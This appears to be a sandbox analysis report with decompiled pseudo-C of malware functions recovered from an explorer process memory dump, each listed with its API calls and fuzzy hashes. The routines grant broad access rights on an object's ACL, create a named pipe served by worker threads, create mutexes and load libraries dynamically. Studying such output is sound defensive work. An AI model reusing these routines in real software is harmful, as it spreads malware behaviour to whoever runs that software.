                  				intOrPtr _v76;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				void _v96;
                  				intOrPtr _t58;
                  				intOrPtr _t61;
                  				intOrPtr _t63;
                  				intOrPtr _t65;
                  				intOrPtr _t67;
                  				intOrPtr _t70;
                  				intOrPtr _t73;
                  				intOrPtr _t77;
                  				intOrPtr _t79;
                  				intOrPtr _t81;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				signed int _t90;
                  				void* _t92;
                  				intOrPtr _t93;
                  				void* _t98;
                  
                  				_t90 = 8;
                  				_v28 = 0xf00;
                  				_v32 = 0;
                  				_v24 = 0;
                  				memset( &_v96, 0, _t90 << 2);
                  				_v20 = 0x100;
                  				_push( &_v12);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_v16 = 0;
                  				_push(0);
                  				_v8 = 0;
                  				_push(1);
                  				_v12 = 0;
                  				_push( &_v24);
                  				_t58 =  *0x9e68c; // 0x40fab8
                  				_t98 = 0;
                  				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                  					L14:
                  					if(_v8 != 0) {
                  						_t67 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                  					}
                  					if(_v12 != 0) {
                  						_t65 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                  					}
                  					if(_t98 != 0) {
                  						_t63 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                  					}
                  					if(_v16 != 0) {
                  						_t61 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                  					}
                  					L22:
                  					return _t98;
                  				}
                  				_v68 = _v12;
                  				_t70 =  *0x9e688; // 0xb0000
                  				_t92 = 2;
                  				_v96 = 0x1fffff;
                  				_v92 = 0;
                  				_v88 = 3;
                  				_v76 = 0;
                  				_v72 = 5;
                  				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                  					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                  						goto L7;
                  					}
                  					goto L4;
                  				} else {
                  					L4:
                  					_push( &_v8);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(1);
                  					_push(_t92);
                  					_push(_t92);
                  					_push( &_v32);
                  					_t85 =  *0x9e68c; // 0x40fab8
                  					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                  						goto L14;
                  					} else {
                  						_t87 = _v8;
                  						if(_t87 != 0) {
                  							_push(2);
                  							_pop(1);
                  							_v64 = 0x1fffff;
                  							_v60 = 1;
                  							_v56 = 3;
                  							_v44 = 0;
                  							_v40 = 1;
                  							_v36 = _t87;
                  						}
                  						L7:
                  						_push( &_v16);
                  						_push(0);
                  						_push( &_v96);
                  						_t73 =  *0x9e68c; // 0x40fab8
                  						_push(1); // executed
                  						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                  							goto L14;
                  						}
                  						_t98 = LocalAlloc(0x40, 0x14);
                  						if(_t98 == 0) {
                  							goto L14;
                  						}
                  						_t93 =  *0x9e68c; // 0x40fab8
                  						_push(1);
                  						_push(_t98);
                  						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                  							goto L14;
                  						}
                  						_t77 =  *0x9e68c; // 0x40fab8
                  						_push(0);
                  						_push(_v16);
                  						_push(1);
                  						_push(_t98);
                  						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                  							goto L14;
                  						}
                  						if(_v8 != 0) {
                  							_t81 =  *0x9e68c; // 0x40fab8
                  							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                  						}
                  						_t79 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                  						goto L22;
                  					}
                  				}
                  			}

                  APIs
                  • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocEntriesLocal
                  • String ID:
                  • API String ID: 2146116654-0
                  • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                  • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _t45;
                  				intOrPtr _t46;
                  				intOrPtr _t48;
                  				intOrPtr _t49;
                  				void* _t52;
                  				intOrPtr _t53;
                  				intOrPtr _t54;
                  				struct _SECURITY_ATTRIBUTES* _t58;
                  				intOrPtr _t59;
                  				intOrPtr _t61;
                  				intOrPtr _t65;
                  				intOrPtr _t66;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				struct _SECURITY_ATTRIBUTES* _t73;
                  				intOrPtr _t74;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				intOrPtr _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t83;
                  				void* _t86;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				signed int _t92;
                  				intOrPtr _t97;
                  				intOrPtr _t98;
                  				int _t106;
                  				intOrPtr _t110;
                  				signed int _t112;
                  				signed int _t113;
                  				void* _t115;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __edx;
                  				_v12 = __ecx;
                  				_t77 =  *0x9e76c; // 0x1dc
                  				_t73 = 0;
                  				if(E0008A4BF(_t77, 0x7530) >= 0) {
                  					_t45 =  *0x9e770; // 0x4095a0
                  					_t112 = 0;
                  					_t106 = 0;
                  					do {
                  						_t78 =  *((intOrPtr*)(_t106 + _t45));
                  						if(_t78 == 0) {
                  							L6:
                  							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                  								_t113 = _t112 << 5;
                  								if(_v8 == _t73) {
                  									 *(_t113 + _t45 + 0x10) = _t73;
                  									_t46 =  *0x9e770; // 0x4095a0
                  									 *(_t113 + _t46 + 0xc) = _t73;
                  									L14:
                  									_t79 =  *0x9e770; // 0x4095a0
                  									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                  									_t48 =  *0x9e770; // 0x4095a0
                  									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                  									_t49 = E0008A471(0, 1);
                  									_t82 =  *0x9e770; // 0x4095a0
                  									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                  									_t83 =  *0x9e770; // 0x4095a0
                  									_t30 = _t83 + _t113 + 4; // 0x4095a4
                  									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                  									_t53 =  *0x9e770; // 0x4095a0
                  									 *(_t113 + _t53) = _t52;
                  									_t54 =  *0x9e770; // 0x4095a0
                  									_t86 =  *(_t113 + _t54);
                  									if(_t86 != 0) {
                  										SetThreadPriority(_t86, 0xffffffff);
                  										_t87 =  *0x9e770; // 0x4095a0
                  										 *0x9e774 =  *0x9e774 + 1;
                  										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                  										_t74 =  *0x9e770; // 0x4095a0
                  										_t73 = _t74 + _t113;
                  									} else {
                  										_t59 =  *0x9e684; // 0x40f8f0
                  										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                  										_t61 =  *0x9e770; // 0x4095a0
                  										_t37 = _t61 + 0xc; // 0x4095ac
                  										_t91 = _t37 + _t113;
                  										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                  											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                  											_t61 =  *0x9e770; // 0x4095a0
                  										}
                  										_t92 = 8;
                  										memset(_t113 + _t61, 0, _t92 << 2);
                  									}
                  									L19:
                  									_t89 =  *0x9e76c; // 0x1dc
                  									E0008A4DB(_t89);
                  									_t58 = _t73;
                  									L20:
                  									return _t58;
                  								}
                  								_t110 = _a4;
                  								_t65 = E00088604(_t110);
                  								_t97 =  *0x9e770; // 0x4095a0
                  								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                  								_t66 =  *0x9e770; // 0x4095a0
                  								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                  									goto L19;
                  								}
                  								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                  								_t67 =  *0x9e770; // 0x4095a0
                  								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                  								_t115 = _t115 + 0xc;
                  								goto L14;
                  							}
                  							goto L7;
                  						}
                  						_t69 =  *0x9e684; // 0x40f8f0
                  						_push(_t73);
                  						_push(_t78);
                  						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                  							_t45 =  *0x9e770; // 0x4095a0
                  							goto L7;
                  						}
                  						_t98 =  *0x9e770; // 0x4095a0
                  						E0008984A(_t106 + _t98, 0);
                  						_t45 =  *0x9e770; // 0x4095a0
                  						goto L6;
                  						L7:
                  						_t106 = _t106 + 0x20;
                  						_t112 = _t112 + 1;
                  					} while (_t106 < 0x1000);
                  					goto L19;
                  				}
                  				_t58 = 0;
                  				goto L20;
                  			}

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
                  • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                  • Opcode Fuzzy Hash: d85dcc44abdee5eb962f219b78c68e4bab4d13c627165069f4ee2b0541897e29
                  • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr _t29;
                  				intOrPtr _t34;
                  				intOrPtr* _t39;
                  				void* _t47;
                  				intOrPtr _t55;
                  				intOrPtr _t58;
                  				char _t60;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t60 = 0;
                  				_v12 = 0;
                  				if(_a4 != 0) {
                  					_t47 = E0008A63B(_t50);
                  					if(_t47 == 0) {
                  						L11:
                  						_t26 = 0;
                  						L12:
                  						L13:
                  						return _t26;
                  					}
                  					_t27 =  *0x9e684; // 0x40f8f0
                  					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                  					if(_t58 == 0) {
                  						L9:
                  						_t29 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                  						if(_t60 != 0) {
                  							E0008861A( &_v12, 0);
                  						}
                  						goto L11;
                  					}
                  					_t4 = _t58 + 1; // 0x1
                  					_t34 = E00088604(_t4); // executed
                  					_t60 = _t34;
                  					_v12 = _t60;
                  					if(_t60 == 0) {
                  						goto L9;
                  					}
                  					_a4 = _a4 & 0;
                  					_push(0);
                  					_v8 = 0;
                  					_push( &_a4);
                  					_push(_t58);
                  					_push(_t60);
                  					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                  						if(_a4 == 0) {
                  							if(_v8 != _t58) {
                  								goto L9;
                  							}
                  							_t39 = _a8;
                  							 *((char*)(_t58 + _t60)) = 0;
                  							if(_t39 != 0) {
                  								 *_t39 = _t58;
                  							}
                  							CloseHandle(_t47);
                  							_t26 = _t60;
                  							goto L12;
                  						}
                  						_t55 = _v8 + _a4;
                  						_a4 = _a4 & 0x00000000;
                  						_push(0);
                  						_push( &_a4);
                  						_v8 = _t55;
                  						_push(_t58 - _t55);
                  						_push(_t55 + _t60);
                  					}
                  					goto L9;
                  				}
                  				_t26 = 0;
                  				goto L13;
                  			}

                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0040FD20,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  • Opcode ID: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
                  • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                  • Opcode Fuzzy Hash: 701268faecb08c7e662e07772a1ad47cf862077a9b2ff723ed93e566bb39f527
                  • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E0008153B(void* __ecx, void* __edx) {
                  				void* _v8;
                  				void* _t3;
                  				signed int _t4;
                  				intOrPtr _t7;
                  				signed int _t9;
                  				intOrPtr _t10;
                  				void* _t24;
                  
                  				_push(__ecx);
                  				_t3 = CreateMutexA(0, 0, 0);
                  				 *0x9e6f4 = _t3;
                  				if(_t3 == 0) {
                  					L11:
                  					_t4 = _t3 | 0xffffffff;
                  					__eflags = _t4;
                  				} else {
                  					_t3 = CreateMutexA(0, 0, 0);
                  					 *0x9e6dc = _t3;
                  					if(_t3 == 0) {
                  						goto L11;
                  					} else {
                  						_t3 = E00081080(0x4ac);
                  						_v8 = _t3;
                  						if(_t3 == 0) {
                  							goto L11;
                  						} else {
                  							 *0x9e6e8 = E000891A6(_t3, 0);
                  							E000885C2( &_v8);
                  							_t7 = E00088604(0x100);
                  							 *0x9e6f0 = _t7;
                  							if(_t7 != 0) {
                  								 *0x9e6fc = 0;
                  								_t9 = E00088604(0x401);
                  								 *0x9e6d4 = _t9;
                  								__eflags = _t9;
                  								if(_t9 != 0) {
                  									__eflags =  *0x9e6c0; // 0x0
                  									if(__eflags == 0) {
                  										E000915B6(0x88202, 0x8820b);
                  									}
                  									_push(0x61e);
                  									_t24 = 8;
                  									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                  									 *0x9e6a0 = _t10;
                  									_t4 = 0;
                  								} else {
                  									_push(0xfffffffc);
                  									goto L5;
                  								}
                  							} else {
                  								_push(0xfffffffe);
                  								L5:
                  								_pop(_t4);
                  							}
                  						}
                  					}
                  				}
                  				return _t4;
                  			}

                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex$AllocateHeap
                  • String ID:
                  • API String ID: 704353917-0
                  • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                  • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                  • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                  • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E0008BC7A(void* __ecx, void* __edx) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				char _t18;
                  				intOrPtr _t19;
                  				intOrPtr _t27;
                  				intOrPtr _t30;
                  				intOrPtr _t36;
                  				intOrPtr _t38;
                  				char _t39;
                  
                  				_t39 = 0;
                  				_t38 =  *0x9e674; // 0x1f8
                  				_v8 = 0;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_v16 = 0;
                  				_t18 = E000895E1(__ecx, 0x84b);
                  				_push(0);
                  				_v24 = _t18;
                  				_push( &_v8);
                  				_push(1);
                  				_push(_t18);
                  				_t19 =  *0x9e68c; // 0x40fab8, executed
                  				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                  					_push( &_v16);
                  					_push( &_v12);
                  					_push( &_v20);
                  					_t27 =  *0x9e68c; // 0x40fab8
                  					_push(_v8);
                  					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                  						_push(_v12);
                  						_t30 =  *0x9e68c; // 0x40fab8
                  						_push(0);
                  						_push(0);
                  						_push(0);
                  						_push(0x10);
                  						_push(6);
                  						_push(_t38); // executed
                  						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                  							_t39 = 1;
                  						}
                  					}
                  					_t36 =  *0x9e68c; // 0x40fab8
                  					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                  				}
                  				E000885D5( &_v24);
                  				return _t39;
                  			}

                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
                  • SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Security$Descriptor$ConvertInfoString
                  • String ID:
                  • API String ID: 3187949549-0
                  • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                  • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                  				char _v8;
                  				char _t5;
                  				struct HINSTANCE__* _t7;
                  				void* _t10;
                  				void* _t12;
                  				void* _t22;
                  				void* _t25;
                  
                  				_push(__ecx);
                  				_t12 = __ecx;
                  				_t22 = __edx;
                  				_t5 = E000895C7(_a4);
                  				_t25 = 0;
                  				_v8 = _t5;
                  				_push(_t5);
                  				if(_a4 != 0x7c3) {
                  					_t7 = LoadLibraryA(); // executed
                  				} else {
                  					_t7 = GetModuleHandleA();
                  				}
                  				if(_t7 != 0) {
                  					_t10 = E0008E171(_t12, _t22, _t7); // executed
                  					_t25 = _t10;
                  				}
                  				E000885C2( &_v8);
                  				return _t25;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                  • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                  				WCHAR* _v8;
                  				char _v12;
                  				char _v44;
                  				char _v564;
                  				char _v1084;
                  				void* __esi;
                  				void* _t23;
                  				struct _SECURITY_ATTRIBUTES* _t25;
                  				int _t27;
                  				char _t32;
                  				char _t38;
                  				intOrPtr _t39;
                  				void* _t40;
                  				WCHAR* _t41;
                  				void* _t54;
                  				char* _t60;
                  				char* _t63;
                  				void* _t70;
                  				WCHAR* _t71;
                  				intOrPtr* _t73;
                  
                  				_t70 = __ecx;
                  				_push(__ecx);
                  				E0008B700(__edx,  &_v44, __eflags, __fp0);
                  				_t52 = _t70;
                  				if(E0008BB8D(_t70) == 0) {
                  					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                  					_pop(_t54);
                  					__eflags = _t23;
                  					if(__eflags == 0) {
                  						_t71 = E00082C64( &_v1084, __eflags);
                  					} else {
                  						E0008B012(_t54,  &_v564); // executed
                  						_t32 = E0008109A(_t54, 0x375);
                  						_push(0);
                  						_v12 = _t32;
                  						_push( &_v44);
                  						_t60 = "\\";
                  						_push(_t60);
                  						_push(_t32);
                  						_push(_t60);
                  						_push( &_v564);
                  						_push(_t60);
                  						_t71 = E000892E5( &_v1084);
                  						E000885D5( &_v12);
                  					}
                  				} else {
                  					_t38 = E0008109A(_t52, 0x4e0);
                  					 *_t73 = 0x104;
                  					_v12 = _t38;
                  					_t39 =  *0x9e684; // 0x40f8f0
                  					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                  					_t78 = _t40;
                  					if(_t40 != 0) {
                  						_t41 = E0008109A( &_v564, 0x375);
                  						_push(0);
                  						_v8 = _t41;
                  						_push( &_v44);
                  						_t63 = "\\";
                  						_push(_t63);
                  						_push(_t41);
                  						_push(_t63);
                  						_t71 = E000892E5( &_v564);
                  						E000885D5( &_v8);
                  					} else {
                  						_t71 = E00082C64( &_v44, _t78);
                  					}
                  					E000885D5( &_v12);
                  				}
                  				_v8 = _t71;
                  				_t25 = E0008B269(_t71);
                  				if(_t25 == 0) {
                  					_t27 = CreateDirectoryW(_t71, _t25); // executed
                  					if(_t27 == 0 || E0008B269(_t71) == 0) {
                  						E0008861A( &_v8, 0xfffffffe);
                  						_t71 = _v8;
                  					}
                  				}
                  				return _t71;
                  			}

                  APIs
                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
                  • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                  • Opcode Fuzzy Hash: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
                  • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E000831C2(void* __edx, void* __eflags) {
                  				CHAR* _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v20;
                  				signed int _t10;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				void* _t16;
                  				intOrPtr _t18;
                  				intOrPtr _t22;
                  				intOrPtr _t28;
                  				void* _t38;
                  				CHAR* _t40;
                  
                  				_t38 = __edx;
                  				_t28 =  *0x9e688; // 0xb0000
                  				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                  				_t40 = _t10;
                  				_v8 = _t40;
                  				if(_t40 != 0) {
                  					_t11 = E00088604(0x80000); // executed
                  					 *0x9e724 = _t11;
                  					__eflags = _t11;
                  					if(_t11 != 0) {
                  						_t12 = E0008BD10(); // executed
                  						_v16 = _t12;
                  						__eflags = _t12;
                  						if(_t12 != 0) {
                  							_push(0xc);
                  							_pop(0);
                  							_v12 = 1;
                  						}
                  						_v20 = 0;
                  						__eflags = 0;
                  						asm("sbb eax, eax");
                  						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                  						 *0x9e674 = _t16;
                  						__eflags = _t16 - 0xffffffff;
                  						if(_t16 != 0xffffffff) {
                  							E0008BC7A( &_v20, _t38); // executed
                  							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                  							__eflags = _t18;
                  							if(_t18 != 0) {
                  								goto L12;
                  							}
                  							_t22 =  *0x9e684; // 0x40f8f0
                  							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                  							_push(0xfffffffd);
                  							goto L11;
                  						} else {
                  							 *0x9e674 = 0;
                  							_push(0xfffffffe);
                  							L11:
                  							_pop(0);
                  							L12:
                  							E0008861A( &_v8, 0xffffffff);
                  							return 0;
                  						}
                  					}
                  					_push(0xfffffff5);
                  					goto L11;
                  				}
                  				return _t10 | 0xffffffff;
                  			}

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
                  • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                  • Opcode Fuzzy Hash: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
                  • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00085AFF(intOrPtr __edx, void* __fp0) {
                  				short _v30;
                  				short _v32;
                  				short _v34;
                  				short _v36;
                  				intOrPtr* _t22;
                  				intOrPtr _t23;
                  				signed int _t30;
                  				intOrPtr _t38;
                  				intOrPtr* _t40;
                  				intOrPtr _t44;
                  				intOrPtr _t45;
                  				intOrPtr* _t46;
                  				signed int _t47;
                  				void* _t55;
                  
                  				_t55 = __fp0;
                  				_t45 = __edx;
                  				_t47 = 0;
                  				_t22 = E00088604(0x14);
                  				_t38 =  *0x9e688; // 0xb0000
                  				_t46 = _t22;
                  				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                  					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                  					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                  					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                  					_v30 = 0;
                  					GetDriveTypeW( &_v36); // executed
                  				}
                  				 *_t46 = 2;
                  				 *(_t46 + 4) = _t47;
                  				_t23 =  *0x9e688; // 0xb0000
                  				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                  				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                  				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                  				if(_t40 == 0) {
                  					L9:
                  					if(E00082DCB() == 0) {
                  						goto L11;
                  					} else {
                  						_t47 = _t47 | 0xffffffff;
                  					}
                  				} else {
                  					_t45 =  *_t40;
                  					_t30 = _t47;
                  					if(_t45 == 0) {
                  						goto L9;
                  					} else {
                  						_t44 =  *((intOrPtr*)(_t40 + 4));
                  						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                  							_t30 = _t30 + 1;
                  							if(_t30 < _t45) {
                  								continue;
                  							} else {
                  								goto L9;
                  							}
                  							goto L12;
                  						}
                  						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                  							L11:
                  							E00084D6D(_t46, _t45, _t55);
                  						} else {
                  							goto L9;
                  						}
                  					}
                  				}
                  				L12:
                  				E0008A39E();
                  				E0008A39E();
                  				return _t47;
